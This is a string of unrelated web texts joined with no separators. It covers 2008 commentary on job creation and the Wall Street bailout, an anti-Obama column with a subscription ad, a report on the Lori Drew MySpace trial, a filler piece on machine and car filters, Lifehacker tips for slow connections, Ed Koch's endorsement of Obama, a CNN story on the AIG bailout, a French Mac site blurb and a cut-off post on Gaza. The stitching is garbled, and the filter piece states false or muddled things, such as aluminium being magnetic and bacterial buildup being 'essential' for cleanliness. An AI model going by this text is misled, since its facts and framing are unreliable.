Instead , the couple  Christopher Greenslate , 28 , and Kerri Leonard , 29 , both high school social studies teachers  bought raw beans , rice , cornmeal and oatmeal in bulk , and made their own bread and tortillas .
Fresh fruits and vegetables were n’t an option .
Ms. Leonard ’s mother was so worried about scurvy , a result of vitamin C deficiency , that they made room in their budget for Tang orange drink mix .
( They do n’t eat meat  not that they could have afforded it . )
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
The crash of 1929 and the ensuing Great Depression imprinted an enduring image on the American imagination : millions of jobless workers on breadlines .
By 1933 , more than 25 percent of the US workforce was unemployed .
This fact , more than anything else , locked the national economy in a state of depression , and the country in a state of hopelessness .
Despite the lessons of history — and despite the grim unemployment numbers released October 3 — Congress included no meaningful job creation initiatives in the legislation it passed in response to the financial crisis .
Instead , in the days preceding and following the $ 700 billion Wall Street bailout , Senate Republicans and George W. Bush repelled the modest measures approved by the House to help the unemployed and the poor .
In doing so , they once again showed where their true loyalties lie .
While unemployment has increased every month this year , the September figures were the worst yet , exceeding all forecasts .
According to the Department of Labor , employers cut 159,000 jobs — more than double the number for August or July , and the largest monthly decline since 2003 .
And the survey on which these numbers is based was conducted during the week of September 8 — before the worst developments in the credit crisis , and long before the stock market entered its current freefall .
The current unemployment rate of 6.1 percent measures only a fraction of the truly unemployed , because it only counts those who are out of work and actively looking for a new job .
It also does not reflect the people working part time because they cannot find full - time work , which has increased to more than 1.5 million in September , compared with 400,000 a year ago .
And even those with jobs are suffering losses .
In the last year , the increase in weekly pay for workers has risen only 2.8 percent , while inflation has been about 5 percent .
The New York Times ‘ David Leonhardt points out that “ unlike some other indicators , like gross domestic product , the jobs statistics describe the tangible effect that the economy is having on households . ”
More ominous is the broad - based nature of the job losses .
They began in the hard - hit industries like construction and real estate , but they have extended to manufacturing , retail , and hotels and restaurants , and are likely to deepen and widen in the coming months .
Writing in the New York Times , Princeton economist Alan Kreuger predicted that “ this financial crisis is likely to threaten middle - and upper - income jobs to a greater extent than has been the case in past recessions . ”
First to go , Kreuger projected , will be jobs producing durable goods that are purchased on credit — and already , auto sales are crashing .
Next will be high - skilled jobs that depend upon investments in “ new plant and equipment , especially high - tech information and computing equipment . ”
Aggressive job creation is likely to be vital to any effective recovery effort , just as it was in the 1930s .
In a concise report issued last Friday , the Center for Economic and Policy Research recommended a “ coordinated fiscal stimulus …on the order of $ 300 billion to $ 400 billion ( 2.0 - 2.7 percent of GDP ) , ” which is “ essential for counteracting the sharp falloff in consumption . ”
This money would be spent on “ aiding state and local governments , extending unemployment benefits , tax rebates to low income individuals , accelerating infrastructure spending and support for energy conserving retrofits of homes and businesses . ”
CEPR directors Dean Baker and Mark Weisbrot noted :
It is possible that even larger boosts to spending may be necessary to restore normal economic activity .
The federal government must be prepared to spend whatever amount is needed to keep the economy creating jobs .
This was the main lesson that we learned from the Great Depression .
Concerns over deficits prevented the government from taking sufficient measures to boost the economy out of its slump until World War II left the government no choice .
It would be an enormous tragedy for the country and the world if the United States were to repeat the same mistakes almost 80 years later .
This , of course , is basic Keynesian economics — the idea that when hard times make people stop spending and money stops flowing , the government should expand the money supply and start spending money itself , “ priming the pump . ”
After the 1929 crash , Republican Treasury Secretary Andrew Mellon advised the government to cut spending to balance the budget , and left desperate banks , businesses , and families to fend for themselves because it would “ purge the rottenness out of the system . ”
But Keynes said he did “ not understand how universal bankruptcy can do any good or bring us nearer to prosperity , ” and he insisted that there was “ no hope of a recovery except in a revival of the high level of investment . ”
The most fundamental way to do this is by creating decent jobs that give people money to spend and restore confidence in the economy — something that was done to a degree through New Deal programs , and then more completely through wartime spending .
What we have today , it appears , is a Keynesian policy for banks and big businesses , and the Mellon plan for everyone else .
This is consistent with the longtime Republican approach , which offers government support to corporations and the rich in the name of stimulating the economy but denies it to the working people who actually create the wealth .
While Congress and the president , under the leadership of Treasury Secretary ( and former Goldman Sachs CEO ) Henry Paulson , managed to come up with a $ 700 billion infusion for the financial industry , it could n’t find a tenth of that to create new jobs or put a few more dollars in the pockets of the neediest Americans .
In the first week of September , the House passed an economic stimulus package that would have spent a relatively modest $ 56 billion on public works projects — not only creating jobs , but also rebuilding infrastructure and promoting alternative energy — along with expansions of food stamps , children nutrition programs , senior meals , and low - income heating assistance , and payments to the states for Medicaid costs .
It also would have extended unemployment benefits , which by one estimate will run out for more than 800,000 Americans in the month of October .
But Senate Republicans blocked a procedural vote ( without much fight from Senate Democrats ) , leaving the intended beneficiaries to twist in the wind .
And Bush had promised to veto the bill .
A statement from the White House declared that “ record spending that could lead to record tax increases or higher deficits will not advance our economic recovery . ”
In an October 7 fact sheet on “ Taking Urgently Needed Action to Stabilize Our Markets , ” the White House elaborated on its plans for helping jobless Americans .
“ President Bush calls on the next Congress , ” it states , to “ encourage more job creation by making all of our tax cuts permanent . ”
Another “ boost ” to “ American businesses and workers , ” it says , could come from “ approving our pending free trade agreements with Colombia , Panama and South Korea . ”
The following day , White House press secretary Dana Perino offered another plan :
The “ best way to help ” unemployed people , she said , is for those people to “ get back to work . ”
Ignoring job creation could doom any chance at a real recovery .
And this week , House Democrats announced that they are working on economic stimulus legislation that could be taken up when Congress returns to Washington after the November 4 election .
Pelosi mentioned a $ 150 billion plan that would focus on job creation and complement the $ 700 billion rescue plan for Big Finance .
On Monday , Barack Obama released a “ rescue plan for the middle class ” that would give businesses a $ 3,000 refundable tax credit for each American job created and finance public works projects that the campaign estimates will create or save one million jobs .
In the near term , jobs - centric economic stimulation is needed to get money flowing and to prevent the rise of even more troubling unemployment .
And over the long term , as MSNBC ’s financial columnist Jim Jubak argues , job creation is vital to the nation ’s economic stability :
Everyone I talk to glibly says , “ Well , I ’ll just have to work longer . ”
At what jobs ?
In an economy in which companies regularly find ways to replace higher - paid older workers with younger employees , most people wo n’t be able to stay at their current jobs .
And in an economy that is exporting its meat - and - potatoes manufacturing jobs and their higher wages and generating mostly lower - paying jobs to replace them , post - retirement workers are going to be competing with a horde of anxious younger workers for even ill - paying , no - benefit , part - time work .
We need Washington to wake up and realize that , yes , we need to create jobs to pull us out of the current economic slowdown but we also need to create jobs to fix the holes blown in the retirement plans of tens of millions of Americans by this financial crisis .
We need not just jobs now but a coordinated national effort — public and private — to create long - term job growth for decades to come .
At my age , in other words , I ’d better get on line for a job at Walmart — which wo n’t do much for any economic recovery .
Most Americans Have No Dog in This Fight By P Jerome
For those of us who are antiwar , anti-government spying , anti-torture and rendition , and in favor of improving the lives of working people , this election season has been a nightmare .
Most presidential elections are awful – months and years of commercials , punditry , and lying – but this year is particularly terrible .
Contrary to the accepted " wisdom " of the electoral experts , Americans are not so divided as we might seem .
More than 80 percent of us oppose the war in Iraq , with the majority wanting immediate withdrawal ( not " redeployment " ) .
Larger majorities want an end to government wiretapping ( and vociferously opposed the wiretapping immunity bill ) , a scaled - back military budget , and universal health care that excludes the insurance industry .
Further , almost no one outside the beltway or the NY financial district bought into the " crisis " that mandated a $ 850 billion bailout for Wall Street .
These are not complicated positions , but we are given the " choice " between John " Bomb , bomb , bomb Iran " McCain and Barack " Threats in 100 different countries " Obama .
McCain is beyond the pale for any but the proto - fascists among us , and even they have reservations about his health and sanity .
But to question whether the potential ascension of " Saint Barack " is a good thing , to put into play questions of his militarism and support for authoritarianism at home , or to outright oppose his candidacy based on lies and war - mongering , is to invite the wrath of the " good liberal " majority .
Beginning with his 2004 convention speech when he called for " missile strikes " against Iran and Pakistan , through his 2008 convention speech imploring America to recognize the " threats of tomorrow , " Mr. Obama has based his candidacy no less on fear and militarism than the dreaded Republicans .
After explaining to a liberal friend that Mr. Obama called for an additional 92,000 troops for the military , for expansion of the genocide in Afghanistan into Pakistan , and an accelerated war on terror in 100 countries ( up from Cheney 's 60 - country target list ) , she simply nodded and said , " This is what you have to say to get elected . "
Say what ?
I see .
To appeal to the mass of the electorate , you have to take positions they oppose .
This twisted " logic " would also seem to include supporting the Wall Street bailout and the wiretapping bill , in which Obama invested significant time and energy .
In my naivete , I thought that any compromise geared toward " winning the election " by this logic meant taking populist positions that a candidate might otherwise not adopt .
Yet here , Mr. Obama takes anti-populist positions to ... win the election ?
A candidate for office can only be judged on what he / she says he believes and says he will do , and on his / her track record .
We have nothing else .
In the case of Obama , we are supposed to believe he says and acts on motives other than his core beliefs for unstated other reasons .
This is , I respectfully submit , nonsense .
When he voted for the wiretap bill , he said he wanted to have all " necessary tools " at his disposal for an Obama presidency .
When he calls for more " boots on the ground " in Afghanistan , or for " missile strikes " in Pakistan , or " keeping the nuclear option on the table " in Iran , he means what he is saying .
His vision is of an imperial America on the march , waging war in pursuit of unspecified " threats " with a bigger , better managed military .
That vision includes domestic spying and austerity budgets for the foreseeable future .
So where does this leave that part of America that opposes wars of aggression , torture , extraordinary rendition , and the war on terror ?
Where does it leave people who want to resist domestic wiretapping or oppose sacrificing our futures for Wall Street profits ?
I know the drill : hold your nose and vote Democratic . . . again .
No , not this time , and never again .
The majority of us do not have a dog in this billion - dollar electoral fight , and the majority will not vote at all , and why should they ?
If McCain wins , more war and more austerity .
If Obama wins , even more war and even more austerity , but with no political opposition .
By November 5 , the same people will be controlling our lives , regardless of the election outcome .
Real power never gets voted out of office .
It must be confronted and overturned .
P Jerome is a civil rights attorney in Washington , D.C. Subscribe to American Free Press .
Online subscriptions :
One year of weekly editions — $ 15 plus you get a BONUS ELECTRONIC BOOK - HIGH PRIESTS OF WAR - By Michael Piper .
Print subscriptions : 52 issues crammed into 47 weeks of the year plus six free issues of Whole Body Health : $ 59 Order on this website or call toll free 1-888-699-NEWS .
Sign up for our free e-newsletter here - get a free gift just for signing up !
Women in Tech : 20 Trailblazers Share Their Journeys
Successful women in the tech trenches share their insights and tackle subjects ranging from how to search out a strong mentor to how to be one -- from how to advance in a large company to how to start your own firm .
Get the Kindle or Paperback .
So far , the testimony in the Lori Drew cyber - bullying trial , which began Wednesday in Los Angeles , has generated headlines for its inherent drama and tragedy : the mother of a teenage daughter , accused of using the MySpace social network to stage an elaborate hoax that ends with the suicide of a troubled 13 - year - old classmate , Megan Meier .
But the legal foundation for the prosecution 's case seems like it belongs to a different court proceeding , one that does n't involve a mother 's tears and stories of teen girl gossip - mongering .
Federal prosecutors are charging Drew with violations of the Computer Fraud and Abuse Act , normally reserved for hacking cases .
Indeed , defense attorneys made it clear during opening statements that no homicide charge has been filed against their client .
Drew has pleaded not guilty to one count of conspiracy and three counts of using a computer without authorization .
Prosecutors are claiming that the 49 - year - old Missouri woman violated MySpace 's terms of service agreement by using the account to harass or intimidate another person .
If found guilty , Drew could face a maximum of 20 years in prison .
But that verdict could also set into motion ramifications for social networks , and for lawmakers eager to deal with the new phenomenon of cyber - bullying .
The Prosecutor 's Gambit
Minneapolis attorney Michael Fleming , chairman of the cyberspace law committee for the American Bar Association , says there 's been some controversy generated by U.S. Attorney Thomas O'Brien 's intention of using the CFAA as the basis for his case against Drew .
" A lot of folks are upset because they do n't like that application , " Fleming told TechNewsWorld .
" A lot of folks are upset that he 's taken a concept written for hackers , and they 're mad because he could n't find an acceptable murder statute .
But if you read the literal wording of the statute , the prosecutor says , ' I do n't care if it was written for hackers . '
The prosecutor is saying it applies to what Lori Drew did . "
One of the criminal offenses prosecutable under the CFAA is the unauthorized use of a computer to cause physical harm to a person , or to cause the " modification or impairment , or potential modification or impairment , of the medical examination , diagnosis , treatment , or care of one or more individuals . "
During Wednesday 's testimony , Megan 's mother , Tina Meier , told the court that her daughter was on medication for depression and attention deficit disorder and had previously tried to commit suicide .
The prosecution claims that Drew and her daughter , Sarah , along with an 18 - year - old accomplice , used MySpace to lure Megan into a relationship with a non-existent " Josh Evans . "
When " Josh " turned against Megan in MySpace messages -- and told her that " the world would be better off without you " --
Megan wrote , " you are the kind of boy a girl would kill herself over . "
That last statement was revealed for the first time in open court Wednesday by O'Brien , and is at the heart of his case against Drew .
" It 's a statute nobody thought of , and to some degree kudos to the prosecutor for getting clever , but a lot of people are upset about the use of that cleverness , " Fleming said .
New Terms for Terms of Service Agreements ?
The jury will have to decide whether Drew violated MySpace 's terms of service agreement -- which all members must acknowledge via mouse click before an account is provided for them -- by using the account to post content that " harasses or advocate harassment of another person . "
Stalking is also prohibited activity on MySpace .
Different Web sites and social networks post their terms of service with varying degrees of transparency , Doug Isenberg , attorney and founder of Atlanta 's GigaLaw Firm , told TechNewsWorld .
" Just about every Web site has some type of terms of service agreement , and some of them are passively displayed on the Web site and some require more active acceptance by the user .
For the most part , the courts have upheld the validity of those types of contracts . "
Most users wo n't read through the entire TOS , Isenberg said , " because we 're just so eager to start using the service and because they 're not negotiable .
You do n't have a choice . "
Lessons from a Sad Case
Some states are already trying to address cyber - bullying , Fleming said , and this case could accelerate their efforts .
" This is , to me , a classic example of the law of unintended consequences .
It 's not that the law is behind the technology , it 's that nobody thought through the consequences of situations where it's not a guy in some basement trying to steal passwords .
If a legislature decides they do n't like this result , they 're probably going to come in and put some rules around what type of harms are we really trying to address with these particular statutes . "
Isenberg also sees the potential for a second look at Web site terms of service agreements .
" It 's possible we could end up with some interesting new case law and learn something from the courts about what is and not required to make these TOSes legally enforceable .
There are ways to present these types of online contracts properly and ways to do it improperly . "
Just like our lungs and liver filter out carbon dioxide and other impurities in the body , so machines need filters to prevent sediment and scale collecting and damaging the machine .
Many people these days use home water filters to remove cryptosporidium from the water because of the poor quality of drinking water .
In fact , a common contaminant of municipal water systems is iron .
Ferrous contamination must be removed from water by special iron water filters because it can cause a horrible metallic taste .
Think how important a filter system is in the hospitality industry .
Filters are important for keeping water tanks in a hygienic state and even coffee machines have filters to block mineral deposits and sediment .
They ensure that the coffee tastes good and that the equipment lasts for a long time .
Filters for doing Life
• We all use washing machines nearly every day , and the working of these filters are much the same as the regular filter .
A common filter in a washing machine is the magnetic and sediment filter .
These filters are designed to remove the magnetic impurities in water such as aluminium , iron , nickel and cobalt .
• Other people use breathing machines , and in such incidences , filters need to be cleaned regularly when they ’re discoloured .
This is because the buildup of bacteria is essential for a clean environment for your mouth and nose .
General - purpose magnetic filters provide filtration and are designed to remove ferrous contamination from industrial fluids .
Filters like this increase fluid life .
Magnetic filtration is the most efficient method to get rid of ferrous particles from industrial fluids such as lubricants and coolants .
Filters Rid your Car Cabin of Dust and Fumes
Your car also has filters such as the oil - , air and fuel filters for instance .
They all catch impurities such as dust .
If they are n’t replaced in time , you ’ll find your car wo n’t be working properly any more .
Certainly , by replacing the filters , your car becomes more efficient .
The air that comes into your car cabin would be full of dust and pollen if it were n’t for the filter .
A carbon activated cabin filter will also take care of odours in your car as well as exhaust gases .
Your car also has a fuel filter which removes impurities such as dust and rust in the fuel .
The fuel filter removes impurities like dust , rust and grit contained in the fuel .
Removal of these contaminants by the fuel filter protects the fuel injectors of your car and thus ensure the optimal performance as well as longevity of the car engine .
Machines with mineral buildup certainly run less efficiently and these days most modern machines have filter systems built into them .
Filtration is a process that separates solids from liquids , allowing the liquid to pass through , leaving behind the solid .
Do Regular Filter Replacement
Filters are important for the smooth , efficient running of cars and machines .
To keep your car and machines working well , you need to keep an eye on the different filters and do filter replacement so that liquids can flow freely .
Even in a world where high - speed internet is just a tall house blend away , anyone can get stuck with a slow or uncertain connection at home , in the office , or at the worst possible time while traveling .
There are , however , measures anyone can take to ensure they 're getting the most information and functionality they can when crunched for time or pressed for bandwidth — or if you just do n't like waiting for things while online .
We 're offering up today 10 tweaks , downloads , and work - arounds for slow connections , slow computers , or just fast - minded people .
Read on for the tips that might just save your life some night when 4 Kb/s is all you can muster .
Photo by laffy4k .
Advertisement
10 . Use Google to read HTML copies of huge documents
Ah , Adobe Acrobat .
It 's free and universally used to view documents exactly as they 'd print , but few things bottleneck a browsing session like an 8MB PDF file , especially if your browser crashes before showing it .
But we can all benefit from Google 's zeal to index everything on Earth .
If you 've got a Google Docs or Gmail account , uploading or emailing a PDF gives you an option to view its as an HTML , which is going to come through a lot faster .
The same holds for PowerPoint presentations , Word 2007 . docx files , and nearly any document you can find in Google search .
One of those work - arounds that 's so simple , you 'll be glad when you remember it when you 're trying to jam through that presentation on a terrible hotel Wi-Fi connection .
Advertisement
9. Use TraceMonkey in Firefox 3.1
G/O Media may get a commission LG 75 - Inch 8K TV Buy for $ 2150 from BuyDig Use the promo code ASL250
More and more developers and established web sites are moving their services online and using JavaScript to create interactive web pages these days .
So when you 're browsing Flickr , MySpace / Facebook , or nearly anything made by Google , as a few examples , the speed at which your browser runs all the developers ' code can matter a lot .
For more responsive pages , it 's hard to beat the mind - blowing speed of TraceMonkey , the new JavaScript engine for Firefox 3.1 .
Mozilla offers nightly builds of TraceMonkey - enabled Firefox 3.1 ( called " Minefield " when you run it , because it can be a bit , well , buggy ) , but Windows users can also test drive 3.1 without harming their existing Firefox .
Of course , depending on who you ask ( and which test you run ) , Google Chrome 's V8 and the brand - new script engine in WebKit , the foundation of Safari , are potentially faster .
In any case , your current browser probably is n't this fast , so taking these speed demons for a test drive can't hurt .
8. Use Safari or Opera
Advertisement
Look at nearly any web site 's traffic statistics , and Apple 's Safari and the Norse - made Opera browser are just a sliver compared to how many use Internet Explorer and Firefox .
In our own browser speed tests , though , we found Opera and Safari to be the champs at loading web pages and rendering JavaScript and CSS templates , respectively .
There are lots of reasons to use Firefox ( extensions ! theming !
Greasemonkey ! ) and Internet Explorer ( some sites only work with it ! ) , but if your browser is mainly just a window on the web , consider keeping a copy of Safari , Opera , or the well - rounded Google Chrome on hand for speeding up your site visits .
7. Make Faster , Fool - Proof Downloads with Down Them All
Advertisement
Right - clicking a picture or link , selecting " Save Link As , " choosing a download spot — it gets real old , real fast , especially if you try to do it on every picture in a Flickr set , every MP3 on a music blog , or anywhere else you do your downloading .
Free Firefox extension DownThemAll , our readers ' favorite download manager , makes it easy to do all those things , or set up smart filters and settings to make any page with tons of files easy to navigate .
For a good guide on setting that up , try our tutorial on supercharging your Firefox downloads with DownThemAll .
6 . Bump up your cache size ( and make other configuration tweaks )
Advertisement
Another set of revelations from living in dial - up land , the configuration options that you 'd normally never touch are serious life - savers if you 're on weak Wi - Fi , an older , slower system , or just tired of watching your mouse cursor do it's " waiting " animation over and over .
Upping your cache size definitely speeds up your back button action and speeds up repetitive banners and graphics .
Sites that really do n't need graphics to work can be disabled with site - by - site exceptions in Firefox , and these days , any browser can open sites you might need to wait on in a new tab while you keep grooving in another .
For getting something done on Google Docs or Zoho , reading feeds in Google Reader , or managing tasks in Remember the Milk , there 's Google 's Gears extension to work offline and connect only when you need to sync your data .
5 . Throttle your home wireless network
Advertisement
Your home 's wireless router does n't have to be a neutral observer while watching your XBox , BitTorrent downloads , multiple laptops , and other web - connected apps and gear fight it out for a finite amount of bandwidth .
Many routers let you negotiate connection rate treaties using Quality of Service settings — and those that do n't can often be made to do so by installing DD - WRT or Tomato .
The end result ?
You can let World of Warcraft run rampant in the evenings , set BitTorrent free in the dead of night , and keep your browser unthrottled during the day .
Check out Adam 's guide to ensuring a fast net connection when you need it for the geeky details .
4 . Swap heavy sites for RSS feeds and mobile versions
Advertisement
Here 's a not - so - secret tip about your Lifehacker editors — we could n't possibly read the full version of every blog , news site , and aggregation site we pull our post material from every day .
RSS feeds are this blog 's bread and butter , and they 're great for getting a lot of reading done in a short amount of time .
We 're split fairly evenly between the Google Reader webapp and NetNewsWire / NewsGator 's desktop clients , but both are a great way to catch up on your regular web reading with a minimum of bandwidth , or no connection whatsoever .
Along those lines , you can run any site that 's chock full of text -y news through the Google Mobilizer for a version that 's fast enough for a mobile phone , and very fast on a desktop .
3. Block Flash and / or JavaScript
Advertisement
Our side editor suggested this move after spending a week on a dial - up connection .
Firefox users have it easy : Install the Adblock Plus and Flashblock extensions , and sites bogged down mostly by unnecessary Flash and huge display ads will come through a lot quicker .
If you 're cool with tweaking your router a bit , you can set up universal ad - blocking through it with the Tomato firmware , or use a solution specific to Chrome , on Internet Explorer through the Toggle Flash add - on or IE7 Pro plug - in , and even on your iPhone or iPod touch .
Lifehacker is , of course , an ad - supported site , and we'd ask that you use such tools only when bandwidth or time are at a serious premium , or for sites that bludgeon you over the head with lowering interest rates , free laptops , and the like .
2 . Set up OpenDNS on your browser or router
Advertisement
If you 're a customer of Time Warner , Verizon , or most any commercial internet provider , you 'll occasionally end up at an ad - filled page whenever you typo your way to a non-existent page , and how quickly your browser knows where to find its data depends on their heavily - taxed servers .
You can do a lot better with OpenDNS , a free service that can speed up your page connections , open pages from keyword shortcuts , serve as a parental filter , and avoid spam-y " no site here " pages .
The service provides detailed how - to instructions for both individual computers and routers , so it 's definitely worth at least a try .
1. Use Secure , Automatic Passwords
Advertisement
Auto - saving , auto - filling passwords have made their way into most every browser , but , by default , they 're only as secure as your ability to keep someone away from your keyboard .
If your browser offers a master password option , use it — in Firefox , it 's the only barrier between you and a single button unveiling all your passwords to snoopy friends or nefarious interlopers .
Of course , if you 're using the same weak password across all your site logins , you 're just asking to have somebody get into your email , private social messages , and other private data .
Using a secure password system can fix that .
If you 're using multiple browsers across different systems , you can keep your time - saving password fillers synced with Dropbox , or take care of bookmarks as well with the ( Firefox only ) Foxmarks .
Whether you need to get your browsing done quick , or you 're just a fan of streamlined web surfing , what do you use to get more out of your time online ?
Tell us your own tips and tricks in the comments .
By Ed Koch - September 9 , 2008
The time has come to declare whom I will be voting for .
When I made my decision four years ago and supported the reelection of George W. Bush , I said at the time the overwhelming issue for me was international Islamic terrorism , including al - Qaeda .
The goal of Islamic terrorists was and still is to reestablish the Caliphate encompassing most of the Muslims living in a host of nations from Spain to Indonesia and placing them under a single religious leader with full authority over the civil affairs of the countries , in the style of Iran .
That goal includes the deaths or forced conversions of Christians and Jews as infidels or the payment by them of tribute , and the elimination of the State of Israel .
In 2004 , I concluded that the one person running for president who understood that danger best and was prepared to fight it and defend America and its allies was George W. Bush .
Even though he is now at a low ebb in popularity , I have no regrets for having campaigned and voted for him .
I said at the time I did n't agree with him on a single domestic issue and so far as I can currently see that is still true with the exception of drilling for oil off our coasts and building nuclear energy plants .
I believe that Bush and Tony Blair , Bush 's main international ally with regard to the war in Iraq and against Islamic terrorism , will be redeemed by history .
President Harry Truman was reviled when he left office , but is now honored for his courage and vision .
Now , once again , I have to make a decision to either endorse the Democratic ticket of Obama and Biden or support the Republican ticket of McCain and Palin .
I am 83 years old .
If I am lucky , I may yet vote not only in this election , but in the presidential election of 2012 and perhaps , if luckier , even in that of 2016 .
I believe I must vote my conscience , and that means for the presidential candidate who in my estimation will best protect the U.S. over the next four years .
I personally know two of those running : Joe Biden and John McCain .
I like and admire them both .
John McCain is a genuine war hero and patriot .
Joe Biden is a friend well versed in foreign and domestic affairs , who had made judgment calls on domestic and foreign policy and legislation that I agree with .
I do not personally really know the Democratic presidential candidate , Barack Obama , having spoken to him only once and briefly , or the Republican vice presidential candidate , Sarah Palin .
One foreign policy issue that particularly concerned me in 2004 was the security of Israel .
I thought in 2004 that issue was better left to President George W. Bush , and I believe I was right .
President Bush understood the need to support the security of Israel and did so .
I did not feel that way about Senator John Kerry .
That is not an issue in this election .
Both parties and their candidates have made clear , before and during this election campaign their understanding of the need to support Israel and oppose acts of terrorism waged against it by Hamas and other Muslim supporters of terrorism .
So the issue for me is who will best protect and defend America .
I have concluded that the country is safer in the hands of Barack Obama , leader of the Democratic Party and protector of the philosophy of that party .
Protecting and defending the U.S. means more than defending us from foreign attacks .
It includes defending the public with respect to their civil rights , civil liberties and other needs , e.g. , national health insurance , the right of abortion , the continuation of Social Security , gay rights , other rights of privacy , fair progressive taxation and a host of other needs and rights .
If the vice president were ever called on to lead the country , there is no question in my mind that the experience and demonstrated judgment of Joe Biden is superior to that of Sarah Palin .
Sarah Palin is a plucky , exciting candidate , but when her record is examined , she fails miserably with respect to her views on the domestic issues that are so important to the people of the U.S. , and to me .
Frankly , it would scare me if she were to succeed John McCain in the presidency .
I reiterate the question each of us must answer in making our choice , who will best protect and defend America , domestically and with respect to the literal defense of the country ?
I hope I 've made the right decision but only time will tell .
Whoever wins should and , I hope , will , following the election , receive the support of all Americans , no matter how they voted , especially in these perilous times .
God Bless America and the next president and vice president of the U.S .
Nikki Blonsky Joins Ugly Betty Cast
Broadway actressis making news again with the announcement that the Hairspray star has joined the cast of Ugly Betty for at least one guest appearance .
She will play Teri , an assistant at Elle who becomes a confidant of Betty Suarez .
We 're told she comes with her own agenda so be forewarned - do n't turn your back on her Betty .
Blonsky made headlines a few months back when she and her family engaged in an airport brawl that landed them in jail .
Check out those details here .
Ugly Betty airs Thursday's on ABC .
The guest episode is expected to air before the end of December .
Whether it will turn into a longer term commitment appears to be up in the air .
Either way , you can bet Blonsky is trying to clean up her recently tattered image .
Photo gallery below .
WASHINGTON ( CNN ) -- Key Republicans on Capitol Hill blasted the Treasury Department and the Federal Reserve on Wednesday for orchestrating an $ 85 billion bailout of insurance giant American International Group , and the White House for not informing them of the plan .
Some lawmakers complained Wednesday they did n't know a bailout of AIG was in the works .
Meanwhile , Democrats blamed the Bush administration for the financial crisis , while the White House pointed a finger at Congress .
The criticism came a day after lawmakers were surprised by the news that taxpayers would again be called on to shore up a member of the struggling financial sector .
" Once again the Fed has put the taxpayers on the hook for billions of dollars to bail out an institution that put greed ahead of responsibility and used their good name to take risky bets that did not pay off , " said Sen.
Jim Bunning , R - Kentucky , a member of the Senate Banking Committee .
A spokesman for Sen. Richard Shelby of Alabama , the top Republican on the committee , said the senator " profoundly disagrees with the decision to use taxpayer dollars to bail out a private company " and is upset the government has sent an inconsistent message to the markets by bailing out AIG after it just refused to save investment bank Lehman Brothers from bankruptcy .
" The American taxpayer should not be asked to unwillingly assume the inordinate risks that financial experts knowingly undertook , particularly when taxpayer exposure is increased by the ad hoc manner in which these bailouts have been engineered , " said Shelby 's aide , Jonathan Graffeo .
Watch how bailout affects taxpayers »
Republican Rep. Roy Blunt of Missouri complained about not getting a heads - up about the bailout and said House Republicans are struggling to " understand a coherent strategy " about which firms get rescued and which ones do n't .
Rep. Adam Putman of Florida , the third - ranking Republican in the House , said the cost is " unnerving " and called on the Treasury Department and Federal Reserve " to dispatch an envoy to the Hill to bring members of Congress up to speed . "
" The communications lines are not operating efficiently , " he said .
Late Wednesday , the White House agreed to send a top Bush economic adviser and an official from the Fed to brief House Republicans on Thursday , according to a House GOP aide .
Meanwhile , congressional Democrats placed the blame for the crisis squarely on the Bush administration , arguing it failed to aggressively regulate the financial industry .
" The most recent bailout initiated by the Bush administration -- that of AIG -- is just another example that George Bush is a failed manager , " said House Speaker Nancy Pelosi , D - California .
" Because of the inattention , or a decision on their part to have crony capitalism in our country , Americans across the country are feeling the pain of this . "
Pelosi said two House committees would investigate the recent bailouts " to tell us how we can avoid this in the future , what went wrong here and also to look into this issue of fraud and mismanagement " at AIG .
White House spokeswoman Dana Perino said Congress could have done more to head off the crisis .
" I think that Congress needs to take -- before they start throwing arrows -- take a little bit of time for some self - reflection , " she said .
" But also , why do n't we just set that aside for a minute and focus on the fact that we have a crisis that we 're trying to manage . "
Senate Majority Leader Harry Reid -- who also complained that he did n't know a bailout of AIG was in the works -- said Congress wo n't change laws immediately to address the rapidly unfolding financial crisis because " no one knows what to do . "
" We are in new territory here , " Reid added .
" You could ask [ Federal Reserve Chairman Ben ]
Bernanke , you could ask [ Treasury Secretary Henry ] Paulson .
They do n't know what to do , but they are trying to come up with ideas . "
Reid said he will keep the Senate in session through the end of the year so committees can hold hearings and start writing legislation that he said could become law next year .
" It 's a multitrillion - dollar issue that 's facing America , and we can't do it in some timeline that is unrealistic , " Reid said .
Democratic presidential candidate Sen. Barack Obama on Thursday said the bailout plan must " protect the families that count on insurance " from AIG .
He also said the Federal Reserve should make sure the bailout plan protects well - paying jobs and helps Americans pay their bills .
At a town hall meeting in Grand Rapids , Michigan , Republican candidates Sen. John McCain and Gov. Sarah Palin both called for reforming the financial markets " in Wall Street and Washington , " as McCain put it .
" We 're going to reform how Wall Street does business and put an end to the greed that has driven our markets into chaos , " McCain said .
" We 'll put an end to multimillion - dollar payouts to CEOs who have broken the public trust .
We 'll put an end to running Wall Street like a casino .
We 'll make businesses work for the benefit of their shareholders and employees , and we 'll make sure your savings -- IRA , 401( k ) and pension accounts -- are protected . "
CNN 's Tom Foreman contributed to this report
All About American International Group Inc. • U.S. Federal Reserve • U.S. Senate • U.S. Department of the Treasury
A propos de Mac Membrane
Toutes l'actualité Mac iPhone iPad c'est ici !
Bienvenue sur le site Mac Membrane le site connecté à la Pomme .
Vous trouverez sur celui-ci l'actualité d'Apple bien sûr mais aussi de nombreux trucs et astuces pour Mac , iPhone , iPad .
Vous êtes un geek vous êtes fan de la marque de Steve Jobs , nous aussi ça tombe bien .
Chaque mois retrouvez des dossiers d'actualité sur votre ordinateur favoris et bien entendu également des tests logiciels , des tests des derniers macOs : Sierra , OS X El Capitan , OS X Mavericks .
Hésitez pas à nous laisser un mail si vous voulez que nous abordions un sujet précis .
Vous pouvez aussi nous faire part de vos articles à cette adresse mail contact [ at ] macmembrane.com
Reddit Email 0 Shares
The UN warns that it is running out of food to distribute in Gaza , putting the civilian population there at severe risk , as a direct result of an Israeli food blockade .
A food blockade ?
That is a war crime !
Why are n’t the people ordering the malnourishment of a civilian population under foreign military occupation being arrested and taken to the Hague for trial ?
I mean , people in the US are routinely arrested for animal abuse because they kept their pets malnourished .
Would n’t it be a crime to do that to Palestinian children ?
Even less dire situations are still harming the Palestinians .
Jeremy Bowen of the BBC reports on the abnormal situation of the Palestinians in Hebron under Israeli occupation :
‘ When I was there last week the school ’s windows were catching the morning sun as Mohammed , eight , teetered in the entrance of his home , holding on to the doorframe .
He has cerebral palsy , so his big brother Amjad , 12 , parks his wheelchair , puts on the brake and lifts him in .
A Palestinian woman and child walk behind an Israeli soldier in Hebron Israeli troops protect the Jewish settlers , and impose restrictions on Palestinians .
He ’s been doing it since Mohammed started school two years ago .
